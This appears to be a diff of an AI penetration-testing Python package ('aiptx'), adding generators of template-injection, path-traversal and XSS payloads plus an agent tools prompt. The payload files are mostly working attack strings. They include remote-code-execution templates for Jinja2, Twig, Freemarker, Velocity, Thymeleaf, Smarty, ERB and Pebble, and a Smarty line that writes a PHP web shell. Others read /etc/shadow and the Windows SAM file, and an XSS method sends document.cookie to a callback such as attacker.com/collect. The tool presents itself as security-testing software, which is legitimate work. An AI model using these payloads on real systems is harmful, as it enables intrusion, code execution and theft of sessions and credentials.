aiptx 2.0.7__py3-none-any.whl

aipt_v2/payloads/templates.py

@@ -0,0 +1,222 @@
+"""
+AIPT Template Injection Payloads
+
+Server-Side Template Injection (SSTI) payloads for security testing.
+"""
+from __future__ import annotations
+
+from typing import Iterator
+
+
+class TemplateInjectionPayloads:
+    """
+    Template injection payload generator.
+
+    Categories:
+    - Detection: Identify template engines
+    - Jinja2: Python/Flask
+    - Twig: PHP/Symfony
+    - Freemarker: Java
+    - Velocity: Java
+    - Thymeleaf: Java/Spring
+
+    Example:
+        ssti = TemplateInjectionPayloads()
+        for payload in ssti.detection():
+            if "49" in response(test(payload)):
+                print("SSTI detected!")
+    """
+
+    @classmethod
+    def detection(cls) -> Iterator[str]:
+        """Payloads to detect template injection"""
+        payloads = [
+            # Math operations (universal)
+            "${7*7}",
+            "{{7*7}}",
+            "#{7*7}",
+            "<%= 7*7 %>",
+            "${{7*7}}",
+            "{7*7}",
+            "*{7*7}",
+
+            # String operations
+            "${7*'7'}",
+            "{{7*'7'}}",
+
+            # Specific engines
+            "{{config}}",  # Jinja2
+            "${class.getResource('').getPath()}",  # Freemarker
+            "#{T(java.lang.System).getenv()}",  # Thymeleaf
+        ]
+        yield from payloads
+
+    @classmethod
+    def jinja2(cls) -> Iterator[str]:
+        """Jinja2 (Python/Flask) payloads"""
+        payloads = [
+            # Basic detection
+            "{{7*7}}",
+            "{{config}}",
+            "{{config.items()}}",
+            "{{self}}",
+
+            # Information disclosure
+            "{{request}}",
+            "{{request.environ}}",
+            "{{request.application}}",
+            "{{g}}",
+
+            # RCE via object traversal
+            "{{''.__class__.__mro__[2].__subclasses__()}}",
+            "{{''.__class__.__bases__[0].__subclasses__()}}",
+
+            # RCE via os module
+            "{{config.__class__.__init__.__globals__['os'].popen('id').read()}}",
+
+            # RCE via subprocess
+            "{{cycler.__init__.__globals__.os.popen('id').read()}}",
+            "{{joiner.__init__.__globals__.os.popen('id').read()}}",
+
+            # RCE via builtins
+            "{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}",
+
+            # Lipsum (Jinja2 specific)
+            "{{lipsum.__globals__.os.popen('id').read()}}",
+            "{{lipsum.__globals__['__builtins__']['__import__']('os').popen('id').read()}}",
+        ]
+        yield from payloads
+
+    @classmethod
+    def twig(cls) -> Iterator[str]:
+        """Twig (PHP) payloads"""
+        payloads = [
+            # Detection
+            "{{7*7}}",
+            "{{_self}}",
+            "{{_self.env}}",
+            "{{_context}}",
+
+            # RCE (Twig 1.x)
+            "{{_self.env.registerUndefinedFilterCallback('exec')}}{{_self.env.getFilter('id')}}",
+
+            # RCE (Twig 2.x/3.x)
+            "{{['id']|filter('system')}}",
+            "{{['cat /etc/passwd']|filter('system')}}",
+
+            # File read
+            "{{'/etc/passwd'|file_excerpt(1,30)}}",
+        ]
+        yield from payloads
+
+    @classmethod
+    def freemarker(cls) -> Iterator[str]:
+        """Freemarker (Java) payloads"""
+        payloads = [
+            # Detection
+            "${7*7}",
+            "${3*3}",
+
+            # RCE
+            "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"id\")}",
+            "<#assign ob=\"freemarker.template.utility.ObjectConstructor\"?new()>${ob(\"java.lang.ProcessBuilder\",\"id\").start()}",
+
+            # File read
+            "${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve('path').toURL().openStream().readAllBytes()}",
+        ]
+        yield from payloads
+
+    @classmethod
+    def velocity(cls) -> Iterator[str]:
+        """Velocity (Java) payloads"""
+        payloads = [
+            # Detection
+            "#set($x=7*7)${x}",
+
+            # RCE
+            "#set($e=\"exp\")",
+            "#set($a=$e.getClass().forName(\"java.lang.Runtime\").getMethod(\"getRuntime\",null).invoke(null,null).exec(\"id\"))",
+            "#set($input=$a.getInputStream())",
+            "#set($sc = $e.getClass().forName(\"java.util.Scanner\"))",
+            "#set($reader=$sc.getConstructor($input.getClass()).newInstance($input))",
+            "$reader.useDelimiter(\"\\\\A\").next()",
+        ]
+        yield from payloads
+
+    @classmethod
+    def thymeleaf(cls) -> Iterator[str]:
+        """Thymeleaf (Java/Spring) payloads"""
+        payloads = [
+            # Detection
+            "${7*7}",
+            "*{7*7}",
+            "#{7*7}",
+
+            # RCE via SpEL
+            "${T(java.lang.Runtime).getRuntime().exec('id')}",
+            "*{T(java.lang.Runtime).getRuntime().exec('calc')}",
+
+            # Environment access
+            "${T(java.lang.System).getenv()}",
+            "${#ctx.environment}",
+        ]
+        yield from payloads
+
+    @classmethod
+    def smarty(cls) -> Iterator[str]:
+        """Smarty (PHP) payloads"""
+        payloads = [
+            # Detection
+            "{$smarty.version}",
+            "{7*7}",
+
+            # RCE
+            "{php}echo `id`;{/php}",
+            "{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,\"<?php passthru($_GET['cmd']); ?>\",self::clearConfig())}",
+
+            # Smarty 3.x
+            "{system('id')}",
+        ]
+        yield from payloads
+
+    @classmethod
+    def erb(cls) -> Iterator[str]:
+        """ERB (Ruby) payloads"""
+        payloads = [
+            # Detection
+            "<%= 7*7 %>",
+
+            # RCE
+            "<%= system('id') %>",
+            "<%= `id` %>",
+            "<%= IO.popen('id').readlines() %>",
+            "<%= require 'open3'; Open3.capture3('id') %>",
+
+            # File read
+            "<%= File.read('/etc/passwd') %>",
+        ]
+        yield from payloads
+
+    @classmethod
+    def pebble(cls) -> Iterator[str]:
+        """Pebble (Java) payloads"""
+        payloads = [
+            # Detection
+            "{{7*7}}",
+
+            # RCE
+            "{% set cmd = 'id' %}{{ cmd.getClass().forName('java.lang.Runtime').getRuntime().exec(cmd) }}",
+        ]
+        yield from payloads
+
+    @classmethod
+    def all(cls) -> Iterator[str]:
+        """All template injection payloads"""
+        yield from cls.detection()
+        yield from cls.jinja2()
+        yield from cls.twig()
+        yield from cls.freemarker()
+        yield from cls.velocity()
+        yield from cls.thymeleaf()
+        yield from cls.smarty()
+        yield from cls.erb()

aipt_v2/payloads/traversal.py

@@ -0,0 +1,166 @@
+"""
+AIPT Path Traversal Payloads
+
+Directory traversal / LFI payloads for security testing.
+"""
+from __future__ import annotations
+
+from typing import Iterator
+from urllib.parse import quote
+
+
+class PathTraversalPayloads:
+    """
+    Path traversal payload generator.
+
+    Categories:
+    - Basic: ../../../etc/passwd
+    - Encoded: URL encoding, double encoding
+    - Filter bypass: Null bytes, wrappers
+    - Windows: ..\\..\\..\\windows\\win.ini
+
+    Example:
+        traversal = PathTraversalPayloads()
+        for payload in traversal.linux():
+            test(f"/read?file={payload}")
+    """
+
+    # Common target files
+    LINUX_FILES = [
+        "/etc/passwd",
+        "/etc/shadow",
+        "/etc/hosts",
+        "/etc/hostname",
+        "/proc/self/environ",
+        "/proc/version",
+        "/var/log/apache2/access.log",
+        "/var/log/nginx/access.log",
+    ]
+
+    WINDOWS_FILES = [
+        "C:\\Windows\\win.ini",
+        "C:\\Windows\\System32\\config\\SAM",
+        "C:\\Windows\\System32\\drivers\\etc\\hosts",
+        "C:\\boot.ini",
+    ]
+
+    @classmethod
+    def linux(cls, depth: int = 10) -> Iterator[str]:
+        """Linux path traversal payloads"""
+        traversal = "../" * depth
+
+        for file in cls.LINUX_FILES:
+            # Basic
+            yield f"{traversal}etc/passwd"
+            yield f"{traversal}{file.lstrip('/')}"
+
+            # With null byte (PHP < 5.3.4)
+            yield f"{traversal}etc/passwd%00"
+            yield f"{traversal}etc/passwd\x00"
+
+            # Absolute path
+            yield file
+
+    @classmethod
+    def windows(cls, depth: int = 10) -> Iterator[str]:
+        """Windows path traversal payloads"""
+        traversal_forward = "../" * depth
+        traversal_back = "..\\" * depth
+
+        for file in cls.WINDOWS_FILES:
+            yield f"{traversal_forward}windows/win.ini"
+            yield f"{traversal_back}windows\\win.ini"
+            yield file
+
+    @classmethod
+    def encoded(cls) -> Iterator[str]:
+        """Encoded path traversal payloads"""
+        payloads = [
+            # URL encoding
+            "%2e%2e%2f" * 5 + "etc/passwd",
+            "%2e%2e/" * 5 + "etc/passwd",
+            "..%2f" * 5 + "etc/passwd",
+
+            # Double URL encoding
+            "%252e%252e%252f" * 5 + "etc/passwd",
+
+            # UTF-8 encoding
+            "..%c0%af" * 5 + "etc/passwd",
+            "..%c1%9c" * 5 + "etc/passwd",
+
+            # 16-bit Unicode
+            "%u002e%u002e%u002f" * 5 + "etc/passwd",
+
+            # Overlong UTF-8
+            "..%c0%ae/" * 5 + "etc/passwd",
+        ]
+        yield from payloads
+
+    @classmethod
+    def filter_bypass(cls) -> Iterator[str]:
+        """Filter bypass techniques"""
+        payloads = [
+            # Double dots
+            "....//....//....//etc/passwd",
+            "..../..../..../etc/passwd",
+
+            # Mixed slashes
+            "..\\../..\\../etc/passwd",
+            "..//..//..//etc/passwd",
+
+            # With current directory
+            "./.././.././../etc/passwd",
+            ".//..//./..//etc/passwd",
+
+            # Absolute with traversal
+            "/var/www/../../etc/passwd",
+
+            # Path truncation (old systems)
+            "../" * 100 + "etc/passwd",
+
+            # Windows UNC paths
+            "\\\\localhost\\c$\\windows\\win.ini",
+            "//localhost/c$/windows/win.ini",
+        ]
+        yield from payloads
+
+    @classmethod
+    def php_wrappers(cls) -> Iterator[str]:
+        """PHP wrapper payloads (LFI to RCE)"""
+        payloads = [
+            # php://filter for source code disclosure
+            "php://filter/convert.base64-encode/resource=index.php",
+            "php://filter/read=string.rot13/resource=index.php",
+            "php://filter/convert.iconv.utf-8.utf-16/resource=index.php",
+
+            # php://input (requires POST)
+            "php://input",
+
+            # data:// wrapper
+            "data://text/plain,<?php system('id');?>",
+            "data://text/plain;base64,PD9waHAgc3lzdGVtKCdpZCcpOyA/Pg==",
+
+            # expect:// wrapper
+            "expect://id",
+
+            # phar:// wrapper
+            "phar://uploads/avatar.jpg/test.php",
+
+            # zip:// wrapper
+            "zip://uploads/archive.zip#shell.php",
+
+            # Log poisoning
+            "/var/log/apache2/access.log",
+            "/var/log/apache2/error.log",
+            "/proc/self/fd/0",
+        ]
+        yield from payloads
+
+    @classmethod
+    def all(cls) -> Iterator[str]:
+        """All path traversal payloads"""
+        yield from cls.linux()
+        yield from cls.windows()
+        yield from cls.encoded()
+        yield from cls.filter_bypass()
+        yield from cls.php_wrappers()

aipt_v2/payloads/xss.py

@@ -0,0 +1,204 @@
+"""
+AIPT XSS Payloads
+
+Cross-Site Scripting payloads for security testing.
+"""
+from __future__ import annotations
+
+import html
+import random
+import string
+from typing import Iterator
+from urllib.parse import quote
+
+
+class XSSPayloads:
+    """
+    XSS payload generator for security testing.
+
+    Categories:
+    - Basic: Simple alert/confirm payloads
+    - Event handlers: onclick, onerror, etc.
+    - Encoded: URL, HTML, Unicode encoding
+    - Filter bypass: WAF evasion techniques
+    - DOM-based: document.write, innerHTML
+
+    Example:
+        xss = XSSPayloads()
+
+        # Get all basic payloads
+        for payload in xss.basic():
+            test(payload)
+
+        # Get payloads with custom marker
+        for payload in xss.with_callback("https://attacker.com/collect"):
+            test(payload)
+    """
+
+    # Unique marker for detection
+    _marker = "AIPT" + "".join(random.choices(string.ascii_lowercase, k=6))
+
+    @classmethod
+    def basic(cls) -> Iterator[str]:
+        """Basic XSS payloads"""
+        payloads = [
+            f'<script>alert("{cls._marker}")</script>',
+            f'<script>alert(String.fromCharCode(65,73,80,84))</script>',
+            f'<img src=x onerror=alert("{cls._marker}")>',
+            f'<svg onload=alert("{cls._marker}")>',
+            f'<body onload=alert("{cls._marker}")>',
+            f'<input onfocus=alert("{cls._marker}") autofocus>',
+            f'<marquee onstart=alert("{cls._marker}")>',
+            f'<video><source onerror=alert("{cls._marker}")>',
+            f'<audio src=x onerror=alert("{cls._marker}")>',
+            f'<details open ontoggle=alert("{cls._marker}")>',
+        ]
+        yield from payloads
+
+    @classmethod
+    def event_handlers(cls) -> Iterator[str]:
+        """Event handler-based payloads"""
+        handlers = [
+            "onclick", "ondblclick", "onmousedown", "onmouseup", "onmouseover",
+            "onmousemove", "onmouseout", "onkeydown", "onkeypress", "onkeyup",
+            "onfocus", "onblur", "onchange", "onsubmit", "onreset", "onselect",
+            "onerror", "onload", "onunload", "onresize", "onscroll",
+        ]
+
+        for handler in handlers:
+            yield f'<div {handler}=alert("{cls._marker}") style="width:100px;height:100px;background:red"></div>'
+            yield f'<input type="text" {handler}=alert("{cls._marker}")>'
+
+    @classmethod
+    def encoded(cls) -> Iterator[str]:
+        """Encoded payloads to bypass filters"""
+        base = f'<script>alert("{cls._marker}")</script>'
+
+        # URL encoding
+        yield quote(base)
+        yield quote(base, safe="")
+
+        # HTML entity encoding
+        yield html.escape(base)
+        yield "".join(f"&#{ord(c)};" for c in base)
+        yield "".join(f"&#x{ord(c):x};" for c in base)
+
+        # Unicode encoding
+        yield base.encode("unicode_escape").decode()
+
+        # Mixed encoding
+        yield f'%3Cscript%3Ealert("{cls._marker}")%3C/script%3E'
+        yield f'&#60;script&#62;alert("{cls._marker}")&#60;/script&#62;'
+
+    @classmethod
+    def filter_bypass(cls) -> Iterator[str]:
+        """Filter/WAF bypass payloads"""
+        payloads = [
+            # Case variations
+            f'<ScRiPt>alert("{cls._marker}")</ScRiPt>',
+            f'<SCRIPT>alert("{cls._marker}")</SCRIPT>',
+
+            # Null bytes
+            f'<scr\x00ipt>alert("{cls._marker}")</script>',
+
+            # Space variations
+            f'<script\t>alert("{cls._marker}")</script>',
+            f'<script\n>alert("{cls._marker}")</script>',
+            f'<script\r>alert("{cls._marker}")</script>',
+
+            # Tag manipulation
+            f'<scr<script>ipt>alert("{cls._marker}")</scr</script>ipt>',
+            f'<<script>script>alert("{cls._marker}")<</script>/script>',
+
+            # Using different tags
+            f'<svg/onload=alert("{cls._marker}")>',
+            f'<svg\tonload=alert("{cls._marker}")>',
+            f'<img src=`x`onerror=alert("{cls._marker}")>',
+            f'<img src="x" onerror="alert(\'{cls._marker}\')">',
+
+            # JavaScript protocol
+            f'javascript:alert("{cls._marker}")',
+            f'java\nscript:alert("{cls._marker}")',
+            f'java\tscript:alert("{cls._marker}")',
+
+            # Data URI
+            f'data:text/html,<script>alert("{cls._marker}")</script>',
+            f'data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=',
+
+            # Expression (IE)
+            f'<div style="x:expression(alert(\'{cls._marker}\'))">',
+
+            # SVG
+            f'<svg><script>alert("{cls._marker}")</script></svg>',
+            f'<svg><animate onbegin=alert("{cls._marker}")>',
+
+            # Without quotes
+            f'<img src=x onerror=alert({cls._marker})>',
+
+            # Without parentheses
+            f'<img src=x onerror=alert`{cls._marker}`>',
+            f'<script>alert`{cls._marker}`</script>',
+
+            # Using eval
+            f'<img src=x onerror=eval(atob("YWxlcnQoJ1hTUycp"))>',
+        ]
+        yield from payloads
+
+    @classmethod
+    def dom_based(cls) -> Iterator[str]:
+        """DOM-based XSS payloads"""
+        payloads = [
+            # document.write
+            f'<script>document.write("<img src=x onerror=alert(\'{cls._marker}\')>")</script>',
+
+            # innerHTML
+            f'<div id="test"></div><script>document.getElementById("test").innerHTML="<img src=x onerror=alert(\'{cls._marker}\')>"</script>',
+
+            # location manipulation
+            f'#<script>alert("{cls._marker}")</script>',
+            f'javascript:alert("{cls._marker}")//',
+
+            # eval-based
+            f'<script>eval("ale"+"rt(\'{cls._marker}\')")</script>',
+            f'<script>setTimeout("alert(\'{cls._marker}\')",0)</script>',
+            f'<script>setInterval("alert(\'{cls._marker}\')",1000)</script>',
+        ]
+        yield from payloads
+
+    @classmethod
+    def with_callback(cls, callback_url: str) -> Iterator[str]:
+        """Payloads that call back to attacker server"""
+        payloads = [
+            f'<script>new Image().src="{callback_url}?c="+document.cookie</script>',
+            f'<img src="{callback_url}?c="+document.cookie>',
+            f'<script>fetch("{callback_url}?c="+document.cookie)</script>',
+            f'<script>navigator.sendBeacon("{callback_url}",document.cookie)</script>',
+        ]
+        yield from payloads
+
+    @classmethod
+    def polyglot(cls) -> Iterator[str]:
+        """Polyglot payloads that work in multiple contexts"""
+        payloads = [
+            f'javascript:/*--></title></style></textarea></script></xmp><svg/onload=\'+/"/+/onmouseover=1/+/[*/[]/+alert("{cls._marker}")//\'>',
+            f'--></script><script>alert("{cls._marker}")</script>',
+            f'"-alert("{cls._marker}")-"',
+            f'\'-alert("{cls._marker}")-\'',
+            f'</script><script>alert("{cls._marker}")</script>',
+        ]
+        yield from payloads
+
+    @classmethod
+    def all(cls) -> Iterator[str]:
+        """All XSS payloads"""
+        yield from cls.basic()
+        yield from cls.event_handlers()
+        yield from cls.encoded()
+        yield from cls.filter_bypass()
+        yield from cls.dom_based()
+        yield from cls.polyglot()
+
+    @classmethod
+    def get_marker(cls) -> str:
+        """Get current unique marker"""
+        return cls._marker

aipt_v2/prompts/__init__.py

@@ -0,0 +1,60 @@
+"""
+AIPT Prompts Module - System prompts and prompt templates
+"""
+
+from typing import Any
+from jinja2 import Environment
+
+
+def load_prompt_modules(module_names: list[str], jinja_env: Environment) -> dict[str, str]:
+    """
+    Load prompt modules by name.
+
+    Args:
+        module_names: List of module names to load
+        jinja_env: Jinja2 environment for template rendering
+
+    Returns:
+        Dictionary mapping module names to their content
+    """
+    modules = {}
+    for name in module_names:
+        try:
+            template = jinja_env.get_template(f"{name}.jinja")
+            modules[name] = template.render()
+        except Exception:
+            modules[name] = ""
+    return modules
+
+
+def get_tools_prompt() -> str:
+    """Get the tools prompt for the agent."""
+    return """
+You have access to the following security tools:
+
+## Terminal Tools
+- execute_command: Run shell commands in isolated Docker sandbox
+- terminal_session: Manage persistent terminal sessions
+
+## Browser Tools
+- browser_navigate: Navigate to URLs
+- browser_click: Click elements
+- browser_type: Type text into inputs
+- browser_screenshot: Take screenshots
+
+## Proxy Tools
+- proxy_intercept: Intercept HTTP traffic
+- proxy_modify: Modify requests/responses
+
+## Security Tools
+- nmap: Port scanning and service detection
+- gobuster: Directory brute-forcing
+- nuclei: Vulnerability scanning
+- hydra: Credential brute-forcing
+- sqlmap: SQL injection testing
+
+Use these tools to accomplish your penetration testing objectives.
+"""
+
+
+__all__ = ["load_prompt_modules", "get_tools_prompt"]

aipt_v2/proxy/__init__.py

@@ -0,0 +1,29 @@
+"""
+AIPT Proxy Module
+
+HTTP/HTTPS traffic interception and manipulation:
+- Request/response capture
+- Traffic modification
+- WebSocket support
+- Integration with mitmproxy
+"""
+
+from .interceptor import (
+    ProxyInterceptor,
+    ProxyConfig,
+    InterceptedRequest,
+    InterceptedResponse,
+)
+from .history import (
+    ProxyHistory,
+    HistoryEntry,
+)
+
+__all__ = [
+    "ProxyInterceptor",
+    "ProxyConfig",
+    "InterceptedRequest",
+    "InterceptedResponse",
+    "ProxyHistory",
+    "HistoryEntry",
+]